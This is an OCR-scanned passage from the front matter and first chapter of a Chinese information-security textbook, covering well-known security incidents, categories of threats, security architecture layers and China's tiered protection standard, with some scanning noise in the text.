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内 容 简 介 


本 书 首先 从 计算 机 信息 安全 典型 案例 人 手 , 着 重 介绍 信息 安全 面临 的 威胁 种 类 、 信 息 安全 技术 体 
系 、 信 息 安 全 防护 等 级 ,信息 安全 相关 技术 和 信息 安全 职业 标准 等 知识 ,具有 比较 鲜明 的 特点 。 全 书 共 
分 为 10 章 , 在 章节 组 合 和 内 容 选 取 上 ,对 一 些 比较 抽象 的 原理 部 分 做 了 弱化 ,相关 技术 都 从 案例 操作 进 
行 导 入 ,有 比较 强 的 可 操作 性 。 

本 书 对 信息 安全 职业 和 职业 能 力 做 了 比较 全 面 的 介绍 ,对 一 些 有 代表 性 的 标准 ,规范 做 了 重点 介 
绍 ,这 些 知 识 都 非常 有 利于 培养 从 业 人 员 的 职业 素养 。 

本 书 在 内 容 组 织 方面 ,具有 图 文 并 茂 .与 实际 生活 联系 紧密 的 特点 ,将 比较 抽象 的 专业 知识 尽 可 能 
地 用 浅显 易 懂 的 叙述 呈现 出 来 ,十 分 符合 现代 读者 的 阅读 习惯 。 
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技术 爱好 者 自学 使 用 。 
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21 世纪 影响 世界 的 三 大 关键 技术 : 以 计算 机 和 网 络 为 代表 的 信息 技术 ;以 基因 工程 
为 代表 的 生命 科学 和 生物 技术 ;以 纳米 技术 为 代表 的 新 型 材料 技术 。 信 息 技术 居 三 大 关 
键 技术 之 首 。 国 民 经 济 的 发 展 采 取信 息 化 带动 现代 化 的 方针 ,要 求 在 所 有 领域 中 迅速 推 
广 信息 技术 ,导致 需要 大 量 的 计算 机 科学 与 技术 领域 的 优秀 人 才 。 

计算 机 科学 与 技术 的 广泛 应 用 是 计算 机 学 科 发 展 的 原动力 ,计算 机 科学 是 一 门 应 用 
科学 。 因 此 ,计算 机 学 科 的 优秀 人 才 不 仅 应 具有 坚实 的 科学 理论 基础 ,而 且 更 重要 的 是 能 
将 理论 与 实践 相 结 合 , 并 具有 解决 实际 问题 的 能 力 。 培 养 计算 机 科学 与 技术 的 优秀 人 才 
是 社会 的 需要 、 国 民 经 济 发 展 的 需要 。 

制订 科学 的 教学 计划 对 于 培养 计算 机 科学 与 技术 人 才 十 分 重要 ,而 教材 的 选择 是 实 
施 教学 计划 的 一 个 重要 组 成 部 分 ,《21 世纪 计算 机 科学 与 技术 实践 型 教程 ) 主 要 考虑 了 下 
述 两 方面 。 

一 方面 ,高 等 学 校 的 计算 机 科学 与 技术 专业 的 学 生 ,在 学 习 了 基本 的 必修 课 和 部 分 选 
修 课 程 之 后 ,立刻 进行 计算 机 应 用 系统 的 软件 和 硬件 开发 与 应 用 尚 存 在 一 些 困难 ,而 (21 世 
纪 计算 机 科学 与 技术 实践 型 教程 ) 就 是 为 了 填补 这 部 分 空白 。 将 理论 与 实际 联系 起 来 ,使 
学 生 不 仅 学 会 了 计算 机 科学 理论 ,而 且 也 学 会 了 应 用 这 些 理论 解决 实际 问题 。 

另 一 方面 ,计算 机 科学 与 技术 专业 的 课程 内 容 需 要 经 过 实践 练习 ,才能 深刻 理解 和 掌握 。 
因此 ,本 套 教 材 增强 了 实践 性 ,应 用 性 和 可 理解 性 ,并 在 体例 上 做 了 改进 一 一 使 用 案例 说 明 。 

实践 型 教学 占有 重要 的 位 置 ,不 仅 体现 了 理论 和 实践 紧密 结合 的 学 科 特 征 ,而 且 对 于 提 
高 学 生 的 综合 素质 ,培养 学 生 的 创新 精神 与 实践 能 力 有 特殊 的 作用 。 因 此 ,研究 和 撰写 实践 
型 教材 是 必需 的 ,也 是 十 分 重要 的 任务 。 优 秀 的 教材 是 保证 高 水 平 教学 的 重要 因素 ,选择 水 
平 高 .内 容 新 、 实 践 性 强 的 教材 可 以 促进 课堂 教学 质量 的 快速 提升 。 在 教学 中 ,应 用 实践 型 
教材 可 以 增强 学 生 的 认 知 能 力 、 创 新 能 力 、 实 践 能 力 以 及 团队 协作 和 交流 表达 能 力 。 

实践 型 教材 应 由 教学 经 验 丰富 .实际 应 用 经 验 丰富 的 教师 撰写 。 此 系列 教材 的 作者 
不 但 从 事 多 年 的 计算 机 教学 ,而且 参 加 并 完成 了 多 项 计算 机 类 的 科研 项 目 , 他 们 把 积累 的 
经 验 、 知 识 . 智 慧 、 素 质 融 于 教材 中 ,奉献 给 计算 机 科学 与 技术 的 教学 。 

我 们 在 组 织 本 系列 教材 过 程 中 ,虽然 经 过 了 详细 的 思考 和 讨论 ,但 毕竟 是 初步 的 党 
试 , 不 完善 甚至 缺陷 不 可 避免 , 敬 请 读者 指正 。 


本 系列 教材 主编 ” 陈 明 
2005 年 1 月 于 北京 
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信息 安全 相关 技术 对 现代 信息 社会 的 重要 意义 不 言 而 喻 ,世界 各 国都 对 其 十 分 重视 。 
小 到 个 人 信息 安全 保障 ,大 到 亿 万 用 户 的 企业 级 商业 信息 系统 ,甚至 国家 级 的 信息 安全 保 
Fit ,都 离 不 开 信息 安全 技术 的 支撑 。 

然而 如 果 将 信息 安全 的 相关 技术 和 从 业 人 员 标 准 进 行 具 体 化 ,我 们 会 发 现 这 实际 上 是 
一 个 非常 繁杂 的 体系 ,信息 安全 技术 几乎 是 包罗 万 象 的 ,对 从 业 人 员 的 技术 等 级 要 求 也 是 参 
差 不 齐 的 ,一 个 有 志 于 在 此 行业 进行 从 业 的 人 员 ,在 开始 进行 学 习 的 时 候 几 乎 无 法 下 手 。 对 
信息 安全 初级 的 从 业 人 员 来 说 ,在 实际 工作 当中 对 技术 等 级 的 要 求 并 非 高 不 可 攀 , 职 业 素养 
才 是 更 加 重要 的 一 环 , 它 要 求 从 业 人 员 具 有 安全 意识 ,知晓 安全 标准 ,遵守 安全 规范 以 及 具 
有 常规 的 安全 技术 等 。 上 述 要 求 无 论 是 对 初级 从 业者 还 是 高 级 技术 人 员 都 同样 适用 。 

本 书 依照 现代 学 生 的 认 知 特点 ,遵从 行业 人 员 的 素质 规范 要 求 , 从 大 家 比较 熟悉 的 信 
息 安全 典型 案例 展开 ,逐次 递 进 ,符合 人 们 的 认 知 规律 。 全 书 共 10 章 ,主要 包括 信息 安全 
技术 概述 ,物理 层 安全 技术 、 加 密 与 解密 技术 ,操作 系统 安全 技术 、 数 据 库 系统 安全 技术 、 
网 络 安 全 技术 、 应 用 安全 技术 ,病毒 木马 和 间谍 软件 以 及 容 灾 与 备份 等 。 此 外 ,本 书 还 对 
信息 安全 职业 与 职业 能 力 做 了 比较 详细 的 介绍 。 全 书 各 章节 紧密 联系 实际 ,对 相关 技术 
介绍 均 具 有 比较 强 的 可 操作 性 ,体现 了 典型 的 应 用 职业 特色 。 

本 书 由 南京 信息 职业 技术 学 院 计算 机 与 软件 学 院 张 永 、 石 家 庄 铁 道 大 学 范 通 让 任 主 编 ， 
南京 信息 职业 技术 学 院 计算 机 与 软件 学 院 的 同 冰 和 任 俊 新 、 南 京 市 玄武 中 等 专业 学 校 沈 斌 
任 副 主编 ,参与 本 书 编写 的 还 有 史 律 、 章 春 梅 . 许 丽 婷 王 莉 和 马 秀 芳 等 资深 一 线 教师 。 

在 此 书 的 编写 过 程 中 ,还 得 到 了 北京 西 普 阳 光 教育 科技 有 限 公司 产品 技术 总 监 林 雪 
纲 博士 的 诚挚 帮助 与 指导 ,对 他 的 无 私 贡献 和 宝贵 建议 表示 真诚 的 感谢 。 

本 书 的 编写 参考 了 大 量 的 书籍 .期 刊 以 及 互联 网 上 的 资源 ,为 此 ,我 们 向 有 关 的 作者 、 
编者 和 译 者 表示 真诚 的 感谢 。 

还 要 感谢 清华 大 学 出 版 社 的 相关 编辑 .出 版 人 员 ,是 他 们 的 辛勤 工作 才 使 本 书 得 以 
出 版 。 

由 于 计算 机 信息 安全 技术 的 变化 日 新 月 异 , 新 事物 层出不穷 ,加 之 编者 水 平 所 限 , 书 
中 玖 漏 之 处 在 所 难免 ,恳请 读者 不 音 批 评 指正 。 
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亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 

。 查找 信息 安全 的 典型 案例 ; 

。 了 解 信息 安全 所 面临 的 威胁 类 型 ; 

。 查找 信息 安全 技术 体系 方面 的 知识 ; 

。 了 解 信息 安全 的 防护 等 级 。 

亏本 章 教学 目标 

本 章 的 教学 目标 是 : 

。 了 解 信息 安全 所 面临 的 各 种 威胁 及 其 表现 形式 ; 

。 了 解 信 息 安 全 体系 和 防护 等 级 方面 的 基本 知识 。 

亏本 章 教学 要 点 

本 章 的 教学 要 点 包括 : 

。 信息 安全 面临 的 威胁 种 类 ; 

。 计算 机 信息 安全 技术 体系 ; 

。 信息 安全 防护 等 级 及 其 分 类 标准 。 

如 本 章 教学 建议 

本 章 内 容 采用 案例 引导 模式 进行 教学 。 

关于 计算 机 信息 安全 ,一 般 人 听 起 来 都 会 感觉 很 神秘 , 谈 起 来 有 些 玄 之 又 玄 的 样子 。 
年 轻 人 往往 会 非常 好 奇 那些 黑客 的 世界 到 底 是 什么 样子 ,是 否 跟 “ 黑 客 帝 国 ” 的 电影 所 表 
现 的 那样 玄妙 而 又 难以 理解 呢 ? 其 实 , 信 息 安全 跟 每 个 人 都 息息相关 ,我 们 的 日 常生 活 ， 
几乎 天 天 都 面临 着 信息 安全 方面 的 挑战 。 生 活 在 信息 时 代 的 我 们 ,电子 信息 交互 流动 已 
经 成 为 一 种 生活 常态 ,信息 安全 所 面 对 的 威胁 前 所 未 有 。 普 通用 户 需要 懂得 一 些 信息 安 
全 方面 的 知识 来 保护 自己 ,而 专业 用 户 需要 更 加 精深 的 专业 知识 来 为 社会 提供 信息 安全 
服务 。 无 论 是 中 国 还 是 全 世界 ,大 家 对 信息 安全 的 重视 已 上 升 到 一 个 极 高 的 层面 。 


1.1 计算 机 信息 安全 典型 案例 


本 节 介绍 一 些 曾 经 发 生 过 的 信息 安全 方面 的 典型 案例 ,通过 这 些 案例 ,能 够 帮助 大 家 
初步 建立 信息 安全 的 意识 。 
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1.1.1 棱镜 门 


2013 年 6 月 ,美国 前 中 央 情 报 局 (CIA) 职 员 爱 德 华 。 斯 诺 登 ( 见 图 1. 1) 将 两 份 绝密 
资料 交 给 英国 《 卫 报 》 和 美国 (华盛顿 邮 报 》, 并 告 之 媒体 何 时 发 表 。 按 照 设 定 的 计划 ， 
2013 年 6 月 5 日 ,英国 ( 卫 报 ) 先 扔 出 了 第 一 颗 和 与 论 炸 弹 : 美国 国家 安全 局 有 一 项 代号 为 
“棱镜 "(PRISM) 的 秘密 项 目 , 要 求 电信 巨头 威 瑞 森 公司 必须 每 天 上 交 数 百 万 用 户 的 通话 
记录 。2013 年 6 月 6 日 ,美国 (华盛顿 邮 报 ) 披 露 称 ,过 去 6 年 间 , 美 国 国家 安全 局 和 联邦 
调查 局 通过 进入 微软 ,谷歌 .苹果 和 雅虎 等 九 大 网 络 巨 头 的 服务 器 ,监控 美国 公民 的 电子 


邮件 、 聊 天 记录 ,视频 及 照片 等 秘密 资料 ( 见 图 1.2)。 美 国 和 与 论 随 之 哗然 ,世界 为 之 震惊 。 


图 1.1 爱德华 .斯 诺 登 


监控 目标 


图 1. 2 “棱镜 ”计划 示意 图 


这 项 代号 为 "棱镜 ?的 高 度 机 密 行动 此 前 从 未 对 外 公开 。 这 是 一 起 美国 有 史 以 来 最 大 
的 监控 事件 ,其 侵犯 的 人 群 之 广 \ 程 度 之 深 让 人 咋舌 。 

2013 年 6 月 7 日 ,在 加 州 圣 何 塞 视察 的 美国 总 统 奥 巴 马 做 出 回应 ,公开 承认 该 计划 。 
在 秘密 项 目 披露 之 前 ,斯 诺 登 已 经 离开 美国 ,后 经 银 转 ,避难 于 俄罗斯 。 在 此 之 后 斯 诺 登 
又 披露 多 项 与 “棱镜 门 > 有 关 的 秘密 文件 ,美国 政府 在 斯 诺 登 持续 爆料 和 国内 国际 对 监控 
计划 出 现 越 来 越 多 质疑 声 的 巨大 压力 下 ,被 迫 主动 解密 与 斯 诺 登 泄露 的 “棱镜 ?网络 监控 
计划 及 电话 监听 计划 这 两 大 秘密 情报 监控 项 目 相关 的 多 份 文件 。 

经 解密 的 资料 显示 ,棱镜 ?计划 监控 的 对 象 和 范围 远 超 想象 ,几乎 涵盖 全 世界 各 国 ， 
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侵害 人 民生 活 的 每 个 层面 。“ 棱 镜 ? 事 件 曝 光 之 后 ,与 此 有 关 的 革 果 `. 思科、 微软. 谷歌 和 
Facebook 等 公司 纷纷 发 表 声 明 , 力 证 自己 “清白 ”; 欧 盟 各 国 感到 “震惊 "和 “愤怒 ”; 俄 罗斯 
和 中 国 等 国家 分 别 发 表 评论 。 几 乎 可 以 说 是 全 球 易 沸 ,事件 产生 的 影响 至 今 余 波 未 息 。 


1.1.2 病毒 


2003 年 8 月 11 日 ,全球 爆发 了 著名 的 “冲击 波 ”(Worm Blaster) 病 毒 ,该 病毒 利用 在 
2003 年 7 月 21 日 公布 的 RPC 漏洞 进行 传播 ,攻击 Windows 2000\XP\Server 2003N 
NT4.0 计算 机 系统 。 在 短 短 的 一 周 之 内 ,“ 冲 击 波 ”病毒 至 少 攻击 了 当时 全 球 80% 的 
Windows 用 户 ,使 他 们 的 计算 机 无 法 工作 并 反复 重启 ( 见 图 1. 3)。 大 量 企 业 用 户 也 未 能 
幸免 。 据 事后 统计 ,“ 冲 击 波 ” 病 毒 及 其 变种 在 全 球 所 造成 的 损失 高 达 几 百 亿美 元 。“ 冲 击 
波 ? 蜂 虫 病毒 原型 的 编写 者 至 今 仍 未 被 发 现 ,美国 联邦 调查 局 (FBI 仅仅 逮捕 了 一 个 编写 
病毒 变种 “冲击 波 B” 的 18 岁 青 年 杰 弗 里 。 帕 森 ( 见 图 1. 4) ,西雅图 一 家 地 方法 院 判 定 帕 
森 18 个 月 有 期 徒刑 。 


CD 一 一 一 一 一 
让 


图 1. 3 “冲击 波 "病毒 感染 表现 图 1.4 杰 弗 里 。 帕 森 


1.1.3 黑客 人 侵 


2011 年 7 月 29 日 ,韩国 通信 委员 会 声称 ,黑客 ( 见 图 1. 5) 袭 击 了 韩国 一 家 门户 网 站 
(Nate) 和 一 家 博客 网 站 (Cyworld) ,导致 3500 万 名 用 户 的 信息 泄露 。 被 泄露 的 信息 有 姓 
名 、 账 号 (ID) .电子 邮件 地 址 、 手 机 号 码 、 密 码 以 及 身份 证 号 码 。 这 是 韩国 历史 上 齐 到 的 
最 大 规模 的 网 络 攻 击 。 


1.1.4 木马 盗号 


2014 年 3 月 ,有 病毒 团伙 利用 马 航 事件 通过 QQ 和 邮件 传播 盗号 木马 ( 见 图 1. 6) ,在 
盗 取 QQ 密码 后 实施 更 多 诈骗 行为 。 此 类 盗号 木马 采用 压缩 包 的 形式 ,伪装 成 热门 新 闻 
事件 最 新 进展 真相 等 ,文件 名 包括 *2014 马 航 失 联 报道 等 ,通过 QQ 文件 或 邮件 的 方式 
传播 ,利用 网 民 的 好 奇 心 , 诱 使 其 点 击 下 载 。 一 旦 此 类 木马 程序 点 击 运行 ,就 会 弹出 假冒 
的 QQ* 重 新 登录 ”窗口 , 诱 使 网 民 输 入 自己 的 QQ 账号 和 密码 ,并 将 其 发 送 到 木马 作者 拱 
建 的 服务 器 上 ,不 法 分 子 盗 取 QQ 后 ,会 以 冒充 好 友 借 钱 等 多 种 方式 实施 诈骗 。 
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图 1.5 黑客 (hacker) 


1.1.5 电子 交易 


2014 年 3 月 22 日 18 点 18 分 ,一 个 编号 为 54302 的 漏洞 报告 被 曝光 在 互联 网 安全 问 
题 反馈 平台 乌云 (wooyun. org) 之 上 ,发 布 者 是 乌云 的 核心 白 帽子 黑客 “ 猪 猪 侠 ”。 这 份 报 
告 表明 ,携程 网 的 一 个 漏洞 会 导致 大 量 用 户 银行 卡 信息 泄露 ,而 这 些 信 息 可 能 直接 引发 盗 
刷 等 问题 。 

漏洞 报告 指出 ,携程 将 用 于 处 理 用 户 支付 的 服务 接口 开启 了 调试 功能 ,使 所 有 向 银行 
验证 持 卡 所 有 者 接口 传输 的 数据 包 均 直接 保存 在 本 地 服务 器 。 而 该 信息 加 密级 别 并 不 够 
高 ,可 以 被 黑客 轻易 获取 。 泄 露 的 信息 包括 用 户 的 持 卡 人 姓名 、 身 份 证 ,所 持 银行 卡 类 别 
(例如 ,招商 银行 信用 卡 、 中 国 银行 信用 卡 )、 卡 号 .CVV 码 (信用 卡 背 后 的 一 组 数字 ) 以 及 
用 于 支付 的 6 位 4 

3 月 23 日 ,携程 — 关于 此 事件 的 详细 解释 ,* 携 程 的 技术 开发 人 员 为 了 排查 系统 
疑问 在 线 上 环境 开启 支付 调试 功能 , 留 下 了 临时 日 志 , 因 玻 忽 未 能 及 时 删除 ,目前 ,这 些 信 
息 已 经 删除 。 经 过 排查 , 仅 漏 洞 发 现 者 做 了 测试 FR, 共 涉 及 93 名 存在 风险 的 携程 用 户 。 
没有 接 到 携程 电话 通知 的 用 户 , 个 人 信息 是 安全 的 。 

虽然 此 次 事件 由 于 漏洞 被 及 时 发 现 所 以 没有 造成 非常 严重 的 直接 损失 ,但 是 它 确实 
表明 这 样 一 个 严峻 的 现实 : 随 着 电子 交易 的 普及 和 便捷 , 越 来 越 多 的 人 依赖 电子 交易 完 
成 商务 活动 ,而 这 些 敏 感 - 旦 造成 泄露 ,后果 简直 是 难以 估量 的 。 


1.1.6 手机 和 人 入侵 


2014 年 9 月 7 日 ,中 央 电 视 台 新 闻 频道 曝光 了 一 款 手 
i" 上 的 间谍 软件 ( 兄 图 1. 7) ,看 似 正常 的 办 公 软 件 , 实 际 上 
却 能 在 用 户 不 知情 的 情况 下 盗 取 隐 私信 息 ,甚至 网 银 。 据 
me 该 款 软件 图 标 就 是 正常 的 移动 办 公文 件 表格 ,而 一 
安装 点 击 ,手机 里 的 联系 人 和 短信 信息 立即 会 被 传 到 黑 
et 短信 ,联系 人 姓名 和 电话 分 毫 不 差 地 被 黑 
客 所 窃取 。 该 病毒 另 一 个 可 怕 之 处 在 于 , 它 不 仅 可 以 获取 ELT 手机 间谍 软件 
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最 新 的 短信 和 联系 人 信息 .而 且 还 能 拦截 用 户 手 机 接收 到 的 有 关 提 示 短 信 。 这 样 银行 等 
金融 机 构 发 给 用 户 的 提示 短信 等 重要 信息 ,就 可 能 被 这 款 病毒 软件 支持 ,取得 了 这 些 信息 
的 不 法 分 子 可 以 在 用 户 完全 不 知情 的 情况 下 ,窃取 用 户 银行 卡 中 的 钱财 。 

随 着 我 国手 机 网 民 数 量 的 持续 增长 ,网民 使 用 手机 上 网 的 比例 已 经 超过 使 用 电脑 上 
网 的 比例 ,智能 手机 已 经 成 为 最 大 的 上 网 通道 。 由 于 手机 中 存在 大 量 的 隐私 资料 和 敏感 
信息 ,一 旦 泄漏 就 可 能 给 用 户 造成 巨大 损失 。 不 法 黑客 也 看 到 了 这 一 点 ,基于 智能 手机 的 
各 类 病毒 .跟踪 定位 程序 ,监听 程序 和 间谍 软件 等 层出不穷 ,给 用 户 造成 了 巨大 的 危害 。 


1.1.7 数据 损坏 灾难 


2008 年 3 月 19 日 ,美国 威斯康辛 数据 中 心 被 火烧 得 一 塌 糊涂 ( 见 图 1.8)。 根 据 事后 
统计 ,这 次 大 火烧 掉 了 75 台 服 务 器 、 路 由 器 和 交换 机 ,当地 大 量 的 站 点 都 瘫痪 。 该 数据 中 
心 属于 当地 一 家 名 为 Camera Corner/Connecting Point 的 公司 所 有 ,该 公司 主 营 网 站 托 
管 和 其 他 IT 服务 。 


图 1.8 火烧 威斯康辛 数据 中 心 


这 次 事故 给 当地 网 站 带 来 了 巨大 损失 。 耗 时 10 天 的 修缮 和 重新 部 署 , 才 使 得 这 些 网 
站 得 以 上 线 。 

由 于 现代 信息 社会 严重 依赖 于 保存 在 电子 设备 中 的 各 种 数据 ,所 以 有 些 重要 的 数据 
一 旦 损坏 ,会 造成 广泛 而 严重 的 后 果 。 

自 计算 机 系统 广泛 应 用 以 来 ,发 生 过 的 数据 损坏 灾难 不 计 其 数 , 尤 其 是 一 些 重大 的 自 
然 灾 害 , 例 如 地 震 、 飓 风 和 洪水 等 具有 毁灭 性 的 破坏 力 。 


1.1.8 ARA bl ills 


据 媒 体 报道 ,国内 某 电信 运营 商 的 第 三 方 合作 公司 技术 人 员 , 因 个 人 利益 驱使 ,在 处 
理 技术 服务 期 间 勾结 内 部 员工 ,利用 工作 之 便 潜 入 电信 运营 商 办 公 内 网 ,非法 下 载 几 百 万 
条 核心 数据 并 出 售 件 取 暴 利 。 

近年 来 ,信息 安全 泄密 事件 频频 发 生 , 有 信息 系统 被 黑客 从 外 部 攻破 的 ,也 有 内 部 人 
员 过 失 泄密 或 主动 窃 密 的 。 在 许多 情况 下 ,内 部 人 员 造 成 的 泄密 危害 要 比 黑客 从 外 部 侵 
入 造成 的 危害 高 得 多 。 近 年 来 比较 典型 的 内 部 人 员 泄 密 事 件 还 包括 中 国人 寿 80 万 份 意 
外 险 保单 信息 泄露 事件 和 圆通 快递 百 万 客户 信息 泄露 事件 等 。 
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随 着 国内 各 大 信息 系统 平台 的 快速 发 展 ,一 些 信 息 系统 平台 的 核心 业务 系统 积累 和 
掌握 了 大 量 的 客户 信息 、 生 产 数据 和 运营 信息 ,这 些 数据 涉及 到 企业 的 自身 发 展 \ 公 民 隐 
私 和 国家 政策 等 众多 方面 ,一 旦 在 安全 防护 方面 存在 管理 制度 缺失 、 系 统管 理 不 规范 和 技 
术 防 控 手 段 支撑 不 到 位 等 诸多 信息 安全 问题 和 风险 ,就 会 造成 极其 严重 的 泄密 事件 ,这 些 
事件 会 严重 损害 客户 的 利益 ,破坏 公司 声誉 ,更 有 其 者 会 危害 到 国家 信息 安全 。 


1.2 计算 机 信息 安全 所 面临 的 威胁 


现在 ,以 计算 机 系统 为 代表 的 信息 系统 所 面临 的 安全 威胁 种 类 极 多 ,主要 的 威胁 包括 
以 下 几 点 。 


1.2.1 信息 泄露 

信息 被 泄露 或 透露 给 某 个 非 授权 的 对 象 称 之 为 信息 泄露 。 
1.2.2. 完整 性 破坏 

数据 被 非 授权 地 进行 增 、 删 ,修改 或 破坏 而 受到 损失 的 情况 。 
1.2.3 拒绝 服务 攻击 

对 信息 或 其 他 资源 的 合法 访问 被 无 条 件 阻止 的 情况 。 
1.2.4 非法 访问 

某 一 资源 被 某 个 非 授权 的 人 ,或 以 非 授 权 的 方式 使 用 的 情况 。 
1.2.5 侦 听 


也 称 之 为 窃听 ,是 用 各 种 可 能 的 合法 或 非法 的 手段 窃取 系统 中 的 信息 资源 和 敏感 信 
。 例 如 对 通信 线路 中 传输 的 信号 搭 线 监听 。 


1.2.6 业务 流 分 析 


通过 对 系统 进行 长 期 监听 ,利用 统计 分 析 方 法 对 诸如 通信 频 度 .通信 的 信息 流向 和 通 
信和 总 量 的 变化 等 参数 进行 研究 ,从 中 发 现 有 价值 的 信息 和 规律 的 情况 。 


1.2.7 假冒 攻击 


通过 欺骗 信息 系统 (或 用 户 ) 达 到 非法 用 户 冒 充 成 为 合法 用 户 ,或 者 特权 小 的 用 户 冒 
充 成 为 特权 大 的 用 户 。 黑 客 大 多 是 采用 假冒 攻击 。 


èr 
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1.2.8 3i XC di 


也 叫 旁 路 控制 ,是 指 攻击 者 利用 系统 的 安全 缺陷 或 安全 性 上 的 脆弱 之 处 获得 非 授权 
的 权利 或 特权 。 


1.2.9 授权 侵犯 


被 授权 以 某 一 目的 使 用 某 一 系统 或 资源 的 某 个 人 , 却 将 此 权限 用 于 其 他 非 授 权 的 目 
的 ,也 称 作 “内 部 攻击 ”。 


1.2.10 木马 攻击 


软件 中 含有 一 个 觉察 不 出 的 有 害 的 程序 段 , 当 它 被 执行 时 ,会 破坏 用 户 的 安全 。 这 种 
应 用 程序 称 为 特洛伊 木马 (Trojan Horse) 。 


1.2.11 病毒 攻击 


计算 机 病毒 是 一 种 在 计算 机 系统 运行 过 程 中 能 够 实现 传染 和 侵害 功能 的 特殊 程序 。 
被 攻击 的 信息 系统 主机 可 能 是 有 意 或 无 意 间 感染 了 病毒 。 


1.2.12. KABEI 


陷阱 门 (Trapdoor) 通 常 是 指 编程 人 员 在 设计 系统 时 有 意 建立 的 进入 手段 。 当 系统 
运行 时 ,在 正确 的 时 间 按 下 正确 的 键 ,或 提供 正确 的 参数 ,你 就 能 绕 过 系统 提供 的 正常 安 
全 检查 和 错误 跟踪 检查 。 


1.3 计算 机 信息 安全 技术 体系 


信息 系统 安全 体系 划分 标准 和 种 类 十 分 繁杂 ,整体 上 可 分 为 国际 标准 和 国家 标准 两 
大 类 ,例如 国际 标准 化 组 织 定义 的 “开放 系统 互 连 安全 体系 结构 ISO 7498-2”, 其 标准 结构 
如 图 1.9 所 示 。 

信息 系统 安全 的 总 需求 是 物理 安全 、 网 络 安全 、 信 息 内 容 安 全 和 应 用 系统 安全 的 总 
和 ,安全 的 最 终 目标 是 确保 信息 的 机 密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 抗 抵赖 性 ,以 及 信息 
系统 主体 (包括 用 户 、 团 体 、 社 会 和 国家 ) 对 信息 资源 的 控制 。 完 整 的 信息 系统 安全 体系 框 
架 由 技术 体系 、 组 织 机 构 体 系 和 管理 体系 共同 构建 ,如 图 1. 10 所 示 。 

从 防范 的 角度 来 看 ,安全 防范 技术 体系 可 划分 为 物理 层 安全 、 系 统 层 安全 、 网 络 层 安 
全 、 应 用 层 安 全 和 管理 层 安 全 五 个 层次 。 


1.3.1 物理 层 安全 技术 
该 层次 的 安全 包括 通信 线路 的 安全 物理 设备 的 安全 和 机 房 的 安全 等 。 物 理 层 的 安 
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OSI 上 参考 模型 


安全 机 制 

鉴别 服务 o jJ 
访问 控制 m 
数据 完整 性 

数据 保密 性 
不 可 抵赖 性 

安全 服务 

图 1.9 开放 系统 互 连 安全 体系 结构 ISO 7498-2 


全 主要 体现 在 通信 线路 的 可 靠 性 (线路 备份 .网 管 软件 和 传输 介质 )、 软 硬件 设备 安全 性 
( 蔡 换 设备 , 拆 印 设备 和 增加 设备 ) ,设备 的 备份 、 防 灾害 能 力 、 防 干扰 能 力 、 设 备 的 运行 环 
境 (温度 、 湿 度 和 烟尘 ) ,不 间断 电源 保障 等 。 
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1.10 信息 系统 安全 体系 框架 


1.3.2 系统 层 安全 技术 


该 层次 的 安全 问题 来 自 网 络 内 使 用 的 操作 系统 和 数据 库 系 统 的 安全 ,如 Windows 
Server, Linux, SQL Server 和 Oracle 等 。 主 要 表现 在 三 个 方面 : 一 是 系统 本 身 的 缺陷 带 
来 的 不 安全 因素 ,主要 包括 身份 认证 、 访 问 控制 和 系统 漏洞 等 ;二 是 系统 的 安全 配置 问题 ; 


第 1 章 ”计算 机 信息 安全 概述 


三 是 病毒 对 系统 的 威胁 。 
1.3.3 网 络 层 安全 技术 


该 层次 的 安全 问题 主要 体现 在 网 络 方面 的 安全 性 ,包括 网 络 层 身份 认证 、 网 络 资源 的 
访问 控制 .数据 传输 的 保密 与 完整 性 、 远 程 接 入 的 安全 、 域 名 系统 的 安全 、 路 由 系统 的 安 
全 、 入 侵 检 测 的 手段 和 网 络 设施 防 病毒 等 。 


1.3.4 ”应 用 层 安全 技术 


该 层次 的 安全 问题 主要 由 提供 服务 所 采用 的 应 用 软件 和 数据 的 安全 性 产生 ,包括 
Web 服务 .电子 邮件 系统 和 DNS 等。 此 外 ,还 包括 病毒 对 系统 的 威胁 。 


1.3.5 管理 层 安 全 技术 
安全 管理 包括 安全 技术 和 设备 的 管理 ,安全 管理 制度 以 及 部 门 与 人 员 的 组 织 规 则 等 。 


管理 的 制度 化 在 很 大 程度 上 影响 着 整个 网 络 的 安全 ,严格 的 安全 管理 制度 、 明 确 的 部 门 安 
全 职责 划分 以 及 合理 的 人 员 角 色 配 置 都 可 以 在 很 大 程度 上 降低 其 他 层次 的 安全 漏洞 。 


1.4 信息 安全 防护 等 级 


根据 中 华人 民 共 和 国 国家 标准 GB/T 22239 一 2008,《 信 息 安 全 技术 一 一 信息 系统 安 
全 等 级 保护 基本 要 求 》, 信 息 系统 根据 其 在 国家 安全 、 经 济 建设 和 社会 生活 中 的 重要 程度 ， 
章 到 破坏 后 对 国家 安全 ,社会 秩序 ,公共 利益 以 及 公民 ,法 人 和 其 他 组 织 的 合法 权益 的 危 
害 程度 等 ,由 低 到 高 划分 为 五 级 ,不 同等 级 的 信息 系统 应 具备 的 基本 安全 保护 能 力 如 下 。 


1.4.1 一 级 防护 


应 能 够 防护 系统 免 受 来 自 个 人 的 、 拥 有 很 少 资源 的 威胁 源 发 起 的 恶意 攻击 ,一般 的 自 
然 灾难 以 及 其 他 相当 危害 程度 的 威胁 所 造成 的 关键 资源 损害 ,在 系统 遭 到 损害 后 ,能 够 恢 
复 部 分 功能 。 


1.4.2 二 级 防护 


应 能 够 防护 系统 免 受 来 自 外 部 小 型 组 织 的 ,拥有 少量 资源 的 威胁 源 发 起 的 恶意 攻击 、 
一 般 的 自然 灾难 以 及 其 他 相当 危害 程度 的 威胁 所 造成 的 重要 资源 损害 ,能 够 发 现 重要 的 
安全 漏洞 和 安全 事件 ,在 系统 章 到 损害 后 ,能 够 在 一 段 时 间 内 恢复 部 分 功能 。 


1.4.3 三 级 防护 


应 能 够 在 统一 安全 策略 下 防护 系统 免 受 来 自 外 部 有 组 织 的 团体 、 拥 有 较为 丰富 资源 
的 威胁 源 发 起 的 恶意 攻击 .较为 严重 的 自然 灾难 以 及 其 他 相当 危害 程度 的 威胁 所 造成 的 
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主要 资源 损害 ,能够 发 现 安全 漏洞 和 安全 事件 ,在 系统 遭 到 损害 后 ,能 够 较 快 恢复 绝 大 部 
分 功能 。 
1.4.4 四 级 防护 


应 能 够 在 统一 安全 策略 下 防护 系统 免 受 来 自 国家 级 别 的 、 敌 对 组 织 的 、 拥 有 丰富 资源 
